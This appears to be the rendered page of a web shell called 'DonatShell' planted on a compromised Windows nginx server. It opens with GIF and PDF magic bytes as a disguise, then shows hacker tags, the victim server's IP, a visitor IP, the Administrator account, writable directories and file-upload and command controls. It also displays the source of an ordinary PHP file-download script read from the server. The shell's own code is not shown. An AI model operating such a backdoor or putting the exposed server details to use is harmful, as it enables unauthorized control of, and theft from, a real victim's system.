GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/common/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : C:/nginx/html/common//download.phpinc
<?php
// common/download.phpinc
// Only allows download if the user is authenticated.
if (!isset($dnFileContents)) { require('application.phpinc'); }

// Set execution time to unlimited.
set_time_limit(0);

// Allow direct file download (hotlinking)?
// Empty - allow hotlinking
// If set to nonempty value (Example: example.com) will only allow downloads when referrer contains this text
define('ALLOWED_REFERRER', '');

// Download folder, i.e. folder where you keep all files for download.
// MUST end with slash (i.e. "/" )

$debug_backtrace = debug_backtrace();
#printVar('$debug_backtrace',$debug_backtrace);

#$dnFileRow = pathinfo($_SERVER['PHP_SELF']);
$dnFileRow = str_replace('\\','/',pathinfo($debug_backtrace[0]['file']));
#printVar('$dnFileRow',$dnFileRow);

$dnFileName = "";
$i = strlen($dnFileRow['dirname'])-1;
#printVar('$i',$i);

while ( substr($dnFileRow['dirname'], $i, 1) != "/" && substr($dnFileRow['dirname'], $i, 1) != "\\" && $i >= 0 ) {
	$dnFileName = substr($dnFileRow['dirname'], $i--, 1) . $dnFileName;
 }
$dnFilePath = './'.$dnFileName;
#printVar('$dnFileName',$dnFileName);
#printVar('$dnFilePath',$dnFilePath);

#define('BASE_DIR',$_SESSION['DIRECTORY_ROOT'].$dnFileRow['dirname']);
define('BASE_DIR',$dnFileRow['dirname']);
#printVar('BASE_DIR',BASE_DIR);
#exit;

#setDebugOn(); require('common/pageFooter.phpinc');

// log downloads?  true/false
define('LOG_DOWNLOADS',true);

// log file name
define('LOG_FILE','downloads.log');

// Allowed extensions list in format 'extension' => 'mime type'
// If myme type is set to empty string then script will try to detect mime type 
// itself, which would only work if you have Mimetype or Fileinfo extensions
// installed on server.
$allowed_ext = array (

  // archives
  'zip' => 'application/zip',

  // audio
  'mp3' => 'audio/mpeg',
  'wav' => 'audio/x-wav',

  // documents
  'conf' => 'text/plain',
  'doc' => 'application/msword',
  'ini' => 'text/plain',
  'pdf' => 'application/pdf',
  'ppt' => 'application/vnd.ms-powerpoint',
  'shtml' => 'application/octet-stream',
  'syn' => 'text/plain',
  'txt' => 'text/plain',
  'xls' => 'application/vnd.ms-excel',
  
  // executables, installers, and links
  'bat' => 'application/octet-stream',
  'exe' => 'application/octet-stream',
  'lnk' => 'application/octet-stream',
  'msi' => 'application/octet-stream',

  // images
  'gif' => 'image/gif',
  'png' => 'image/png',
  'jpg' => 'image/jpeg',
  'jpeg' => 'image/jpeg',

  // iso images
  'iso' => 'application/octet-stream',

  // video
  'mpeg' => 'video/mpeg',
  'mpg' => 'video/mpeg',
  'mpe' => 'video/mpeg',
  'mov' => 'video/quicktime',
  'avi' => 'video/x-msvideo'
);

####################################################################
###  DO NOT CHANGE BELOW
####################################################################

// If hotlinking not allowed then make hackers think there are some server problems.
if (ALLOWED_REFERRER !== ''
&& (!isset($_SERVER['HTTP_REFERER']) || strpos(strtoupper($_SERVER['HTTP_REFERER']),strtoupper(ALLOWED_REFERRER)) === false)
) {
  die("Internal server error. Please contact system administrator.");
}

// Make sure program execution doesn't time out
// Set maximum script execution time in seconds (0 means no limit)
set_time_limit(0);

// Check if the file exists
// Check in subfolders too
function find_file ($dirname, $dnFileName, &$file_path) {
  $dir = opendir($dirname);
  while ($file = readdir($dir)) {
    if (empty($file_path) && $file != '.' && $file != '..') {
      if (is_dir($dirname.'/'.$file)) {
        find_file($dirname.'/'.$file, $dnFileName, $file_path);
      }
      else {
        if (file_exists($dirname.'/'.$dnFileName)) {
          $file_path = $dirname.'/'.$dnFileName;
          return;
        }
      }
    }
  }

} 

// find_file
// get full file path (including subfolders)
$file_path = '';
if (!isset($dnFileContents) || $dnFileContents == '') {
	find_file(BASE_DIR, $dnFileName, $file_path);
	if (!is_file($file_path)) {
		die("File does not exist. Make sure you specified correct file name."); 
	}
	// file size in bytes
	$fsize = filesize($file_path); 
} else {
	$fsize = strlen($dnFileContents); 
}


// file extension
$fext = strtolower(substr(strrchr($dnFileName,"."),1));

// get mime type
if (!isset($allowed_ext[$fext]) || $allowed_ext[$fext] == '') {
  $mtype = '';
  // mime type is not set, get from server settings
  if (function_exists('mime_content_type')) {
    $mtype = mime_content_type($file_path);
  } else {
		if (function_exists('finfo_file')) {
    	$finfo = finfo_open(FILEINFO_MIME); // return mime type
    	$mtype = finfo_file($finfo, $file_path);
    	finfo_close($finfo);  
  	}
	}
  if ($mtype == '') {
    $mtype = "application/force-download";
  }
} else {
  // get mime type defined by admin
  $mtype = $allowed_ext[$fext];
}

// check if allowed extension
#if (!array_key_exists($fext, $allowed_ext)) {
#  die("Not allowed file type. Type is: $mtype"); 
#}

// Browser will try to save file with this filename, regardless original filename.
// You can override it if needed.

if (!isset($_GET['fc']) || empty($_GET['fc'])) {
  $asdnFileName = $dnFileName;
}
else {
  // remove some bad chars
  $asdnFileName = str_replace(array('"',"'",'\\','/'), '', $_GET['fc']);
  if ($asdnFileName === '') $asdnFileName = 'NoName';
}

// set headers
/** /
echo '<pre>
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Cache-Control: public");
header("Content-Description: File Transfer");
header("Content-Type: '.$mtype.'");
header("Content-Disposition: attachment; filename=\"'.$asdnFileName.'\"");
header("Content-Transfer-Encoding: binary");
header("Content-Length: '.$fsize.'");
</pre>';
/**/

/**/
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Cache-Control: public");
header("Content-Description: File Transfer");
header("Content-Type: $mtype");
header("Content-Disposition: attachment; filename=\"$asdnFileName\"");
header("Content-Transfer-Encoding: binary");
header("Content-Length: $fsize");
/**/

// download the file.
if (!isset($dnFileContents) || $dnFileContents == '') {
	// Contents not previously set. Read and send the file as a download.
	$file = @fopen($file_path,"rb");
	if ($file) {
		while(!feof($file)) {
			print(fread($file, 1024*8));
			flush();
			if (connection_status()!=0) {
				@fclose($file);
				die();
			}
		}
		@fclose($file);
	}
} else {
	// Contents previously set. Send $dnFileContents as a download.
	print $dnFileContents;
}

/** /
// log downloads
if (!LOG_DOWNLOADS) die();

$f = @fopen(LOG_FILE, 'a+');
if ($f) {
  @fputs($f, date("m.d.Y g:ia")."  ".$_SERVER['REMOTE_ADDR']."  ".$dnFileName."\n");
  @fclose($f);
}
/**/
?>

Anon7 - 2022
AnonSec Team